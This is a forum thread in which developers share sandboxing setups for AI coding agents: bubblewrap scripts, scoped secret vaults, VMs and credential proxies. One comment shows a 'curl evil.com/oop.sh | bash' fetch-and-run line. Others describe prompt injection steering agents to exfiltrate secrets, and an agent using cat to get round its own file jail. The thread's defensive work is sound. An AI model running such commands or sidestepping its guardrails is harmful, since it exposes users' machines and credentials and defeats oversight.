Mysql user: test
Password: mypass123
Host: localhost
...
I could prevent this by running Claude outside of this context. I'm not going to, because this context only has access to my dev secrets. Hence the vault name: `81 Dev environment variables`.
I've configured it so that the 1P CLI only has access to that vault. My prod secrets are in another vault. I achieve this via an OP_SERVICE_ACCOUNT_TOKEN variable set in .zshrc.
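For anyone wanting to copy this: roughly, you create a service account scoped to just the dev vault and export its token. Something like the following sketch (the vault name and token are illustrative, and the exact op syntax is from memory, so check the 1Password CLI docs):
op service-account create "claude-dev" --expires-in 90d --vault "81 Dev environment variables:read_items"
# then in ~/.zshrc, so every shell (and anything launched from it) only gets the scoped token:
export OP_SERVICE_ACCOUNT_TOKEN="ops_..."   # placeholder; paste the token printed by the command above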
I can verify this works by running:
op run --env-file='.env.production' -- printenv
[ERROR] 2026/01/15 21:37:41 "82 Prod environment variables" isn't a vault in this account. Specify the vault with its ID or name.
Also, of course, 1Password pops up a fingerprint request every time something tries to read its database. So if that happened unexpectedly, I'd wonder what was up. I'm acutely conscious of those requests. I can't imagine it's perfect, but I feel pretty good.
Funny enough Bubblewrap is also what Flatpak uses.
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much more limited, way of using LLMs to write code.
Yeah, this is the point where I'd want to keep a human in the loop. Because you'd do that if you were pair programming with a human on the same computer, right?
When I have paired, normally the other person can e.g. run the app without getting my review & signoff, because the other person is also a programmer, (typically) working on their own computer.
The overall result will be the product of two minds, but I have never seen a pairing session where the driver waits for permission to run code.
Much better to allow full Bash but run in a sandbox that controls file and network access.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Whenever you add a new script or utility to a whitelist, you have to actively think about whether any new combination may lead to privilege escalation or unintended effects.
No, you don't. You have a command generated by auditable, conventional code (in the agent wrapper) rather than by a neural network.
I see what you're saying, makes sense.
FWIW there is (in analytics) also an RBAC layer, like "BI tool acting on behalf of user X shall never make edits to tables Y and Z"
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
> Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
One of the things Claude can do is write its own tools, even its own programming languages. There's no fundamental way to make it impossible to run something dangerous, there is only trust.
It's remarkable that these models are now good enough that people can get away with trusting them like this. But, as Simon has himself said on other occasions, this is "normalisation of deviance". I'm rather the opposite: as I have minimal security experience but also have a few decades of watching news about corporations suffering leaks, I am absolutely not willing to run in YOLO mode at this point, even though I already have an entirely separate machine for claude with the bare minimum of other things logged in, to the extent that it's a separate github account specifically for untrusted devices.
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
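A minimal sketch of that approach, assuming a dedicated local user and made-up paths:
# one-time: a separate low-privilege user for agents
sudo useradd --create-home agent
# give the agent a copy of the project, not the original
sudo cp -r ~/projects/myapp /home/agent/myapp
sudo chown -R agent:agent /home/agent/myapp
chmod 700 ~/projects/myapp          # original stays unreadable to the agent user
# run the coding agent as that user (assuming the CLI is installed for that user)
sudo -iu agent claude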
Famous last words
I’ll stop torturing the analogy now, but what I mean by that is that you can use the tools productively and safely. The insistence on running everything as the same user seems unnecessary. It’s like an X-Y problem.
Really this is on the tool makers (looking at you Anthropic) not prioritizing security by default so the users can just use the tools without getting burned and without losing velocity.
You must not care about those systems that much.
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene - and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
Yes that is correct. However, I think embedding bubblewrap in the binary is a risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
That's helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn't have this risk if they had you invoke Claude under bubblewrap yourself.
Additionally, the pattern of using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents, so you get consistency in access controls for all agents.
I hope the desirability of having consistent access controls across all agents is shared by others. You don't get that property if you use Claude's embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to the implementation of controls.
Don't leave prod secrets in your dev env.
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions
--bind "$HOME/.claude" "$HOME/.claude"
That directory has a bunch of sensitive stuff in it, most notably the transcripts of all of your previous Claude Code sessions. You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.
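One mitigation, if you only need the credentials and settings in there and not the history: mount ~/.claude but cover the transcripts with an empty tmpfs. This assumes the transcripts live under ~/.claude/projects, which could change between versions:
--bind "$HOME/.claude" "$HOME/.claude" \
--tmpfs "$HOME/.claude/projects" \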
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
exec bwrap \
--unshare-pid \
--unshare-ipc \
--unshare-uts \
--share-net \
--bind "$OPENCODE_ROOT" "$OPENCODE_ROOT" \
--bind "$CURRENT_DIR" "$CURRENT_DIR" \
--bind "$HOME/.config/opencode/" "$HOME/.config/opencode/" \
--bind "$HOME/.emacs" "$HOME/.emacs" \
--bind "$HOME/.emacs.d" "$HOME/.emacs.d" \
--ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
--ro-bind /bin /bin \
--ro-bind /etc /etc \
--ro-bind /lib /lib \
--ro-bind /lib64 /lib64 \
--ro-bind /usr /usr \
--bind /run/systemd /run/systemd \
--tmpfs /tmp \
--proc /proc \
--dev /dev \
--setenv EDITOR emacs \
--setenv PATH "$OPENCODE_BINDIR:/usr/bin:/bin" \
--setenv HOME "$HOME" \
-- \
"opencode" "$@"I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.
I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.
Just no nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- curl evil.com/oop.sh | bash
Bubblewrap is a very minimal setuid binary. It's 4000 lines of C, but essentially all it does is parse your flags and ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering mounting only src/ read/write, with the project metadata (including .git) read-only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
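Sketched with bwrap, that combination might look roughly like this (paths illustrative): the project mounted read-only, src/ writable on top, plus --new-session:
exec bwrap \
  --ro-bind image/ / \
  --ro-bind "$PROJECT" /project \
  --bind "$PROJECT/src" /project/src \
  --new-session \
  --unshare-all --share-net \
  --proc /proc --dev /dev --tmpfs /tmp \
  -- opencode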
Internet to connect with the provider, install packages, and search.
It's not perfect but it's a start.
Let me know if you give it a go ;)
[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information
Still, I don’t think bubblewrap is either a simple or safe enough solution.
- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).
- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).
I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here, seems you always get the worst of both worlds if you do that.
Maybe the use case for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaking a secret that's in context? So it's not that it's a 'mixed' use case but rather it's just increasing safety in the supervised case?
[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down
(If the VM is remote, even more so).
I see there are cloud VMs like at Kilo Code, but they are kind of useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong, and maybe I also want Kilo Code to run a docker stack for me, which it can't in the agent cloud.
Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.
The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.
This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.
I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.
TLDR:
- Ensure that you have installed npm on your machine.
- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`
- Clone the Claude Code repo: https://github.com/anthropics/claude-code
- Navigate into the root directory of that repo.
- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`
- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`
And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)
I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.
- confused/misaligned agent: probably good enough (as of Q1 2026...).
- hijacked agent: definitely not good enough.
But also it's kinda weird that we still have high-level interfaces that force you to care this much about the type of virtualization it's giving you. We probably need to be moving more towards stuff like Incus here that treats VMs and system containers basically as variants of the same thing that you can manage at a higher level of abstraction. (I think k8s can be like that too).
There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.
Why in the cloud and not in a local VM?
I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.
https://blog.emilburzo.com/2026/01/running-claude-code-dange...
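The core loop is only a few commands; the box name and the assumption that Claude Code gets provisioned into the VM are illustrative:
vagrant init debian/bookworm64     # or whatever base box you trust
vagrant up                         # project dir is synced to /vagrant by default
vagrant ssh -c 'cd /vagrant && claude'
vagrant destroy -f                 # throw the whole VM away when done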
> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.
The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.
> VMs with 3D acceleration
I think we don't even need 3D acceleration since Vagrant is running the VMs headless anyways and just ssh-ing in.
> Incus (on Linux hosts)
That looks interesting, though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?), but I guess a good old shell script could replace that, even if imperative can be more annoying than declarative.
And since it seems to have a full-VM mode, docker would also work without exposing the host docker socket.
Thanks for the tip, it looks promising, I need to try it out!
It's just YAML config for the VM's resources:
https://linuxcontainers.org/incus/docs/main/howto/instances_...
https://linuxcontainers.org/incus/docs/main/explanation/inst...
And cloud-init for provisioning:
https://gitlab.oit.duke.edu/jnt6/incus-config/-/blob/main/co...
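For a rough idea of the CLI side, launching a VM-mode instance with resource limits and cloud-init data looks something like this (image, limits, and file name are just examples):
incus launch images:debian/12/cloud agent-vm --vm \
  -c limits.cpu=4 -c limits.memory=8GiB \
  -c cloud-init.user-data="$(cat cloud-init.yaml)"
incus exec agent-vm -- bash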
Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.
https://www.wired.com/story/anthropic-claude-snitch-emergent...
1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.
2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.
If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.
Very interested in being wrong about this. Please correct me!
Where I’m at with #2 is the agent builds a prototype with its own private session credentials.
I have orchestration set up that can replicate the prototyping session.
From there I can keep final build keys secret from the agent.
My build loop is meant to build an experiment first, and then an enduring build based on what it figures out.
You set up a simple proxy server on localhost:1234 that forwards all incoming requests to the real API, and the crucial part is that the proxy adds the "Auth" header with the real auth token.
This way, the agent never sees the actual auth token, and doesn't have access to it.
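As a concrete sketch, any reverse proxy that can inject request headers works. With Caddy, for example, it might look roughly like this, run outside the sandbox where the real token lives (flags are from memory of the reverse-proxy subcommand, so double-check them; the API host is a placeholder):
REAL_TOKEN=$(op read "op://Prod/my-api/token")   # or however you fetch the real credential
caddy reverse-proxy --from http://localhost:1234 --to https://api.example.com \
  --change-host-header \
  --header-up "Authorization: Bearer ${REAL_TOKEN}"
The agent's code is then pointed at http://localhost:1234 and never sees a token at all.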
If the agent has full internet access then there are still risks. For example, a malicious website could convince the agent itself to perform malicious requests against the API (like delete everything, or download all data and then upload it all to some hacker server).
But in terms of the security of the auth token itself, this system is 100% secure.
Did you make this account to tell me this? Thank you!
If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.
You can easily script it to decode passwords on demand.
I originally set up the git filters, but later disabled them.
Are there any good reasons to pick one over the other?
https://gitlab.exherbo.org/sydbox/sydbox
UPDATE: there is another sydbox written in Go; it's not related and seems too different from bwrap.
1. I never use permanent credentials for AWS on my local computer.
2. I never have keys anywhere on my local computer. I put them in AWS Secret Manager.
3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).
It’s not foolproof. But it does reduce the attack surface.
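As a sketch of what that looks like in practice (profile and secret names are made up): short-lived credentials from SSO, and secrets fetched from Secrets Manager at runtime instead of living in files:
aws sso login --profile dev
aws secretsmanager get-secret-value \
  --secret-id myapp/stripe-key \
  --query SecretString --output text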
The approach I started taking is mounting the directory that I want the agent to work on into a container. I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to. I also mount any config it might need as read-only.
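Roughly, with a hypothetical image name and config path:
docker run --rm -it \
  -v "$PWD":/_ \
  -v "$HOME/.config/myagent":/home/agent/.config/myagent:ro \
  -w /_ \
  my-agent-image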
The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout. I want a tool for managing agents, and I want each agent to be its own process, in its own container. But just locking up the whole mess seems to work for now.
I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer to them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.